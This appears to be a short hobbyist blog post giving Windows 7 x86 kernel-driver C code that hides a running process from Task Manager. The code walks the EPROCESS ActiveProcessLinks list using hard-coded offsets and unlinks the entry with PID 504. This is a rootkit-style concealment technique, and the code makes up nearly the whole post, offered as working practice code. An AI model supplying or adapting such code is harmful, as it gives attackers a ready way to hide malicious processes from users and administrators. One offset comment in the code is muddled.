I'm free to write to play and practice, there is no technical content, just a simple chain picking, task manager can not see
Test environment Win7 x86
typedef struct
{
DWORD_PTR EProcess;
UCHAR* ImageName;
ULONG ProcessID;
}_Process_Info;
NTSTATUS HideProcess()
{
DWORD_PTR CurrentEProcess = (DWORD_PTR)PsGetCurrentProcess(); // 首先取到自身EPROCESS结构
// EPROCESS + 0x16c = ImageFileName
KdPrint(("SpriteDrv: Current Image File Name: %s\n", (UCHAR*)(CurrentEProcess + 0x16c)));
// 取活动进程链表
// EPROCESS + 0x16c ] + 0xb8 = ActiveProcessLinks
PLIST_ENTRY pActiveProcessLinks = (LIST_ENTRY*)(CurrentEProcess + 0xb8);
PLIST_ENTRY pNextPtr = pActiveProcessLinks->Flink;
int count = 0;
while (pNextPtr->Flink != pActiveProcessLinks->Flink) {
_Process_Info ProcessInfo;
ProcessInfo.EProcess = ((DWORD_PTR)pNextPtr - 0xb8);
ProcessInfo.ImageName = (UCHAR*)(ProcessInfo.EProcess + 0x16c);
ProcessInfo.ProcessID = *((ULONG*)(ProcessInfo.EProcess + 0xb4));
KdPrint(("SpriteDrv: Image File Name: %s\t\t%d\n", ProcessInfo.ImageName, ProcessInfo.ProcessID));
// 因为部分进程取出来的进程名会有问题 (部分没有\0符 也没有在结构里找到长度元素)
// 所以用PID来判断是否为被隐藏的进程
if (ProcessInfo.ProcessID == 504) {
// 摘链操作
pNextPtr->Blink->Flink = pNextPtr->Flink;
pNextPtr->Flink->Blink = pNextPtr->Blink;
}
count++;
pNextPtr = pNextPtr->Flink;
}
KdPrint(("SpriteDrv: Process size: %d\n", count));
return STATUS_SUCCESS;
}Effect picture
If there are errors, please correct them in the comments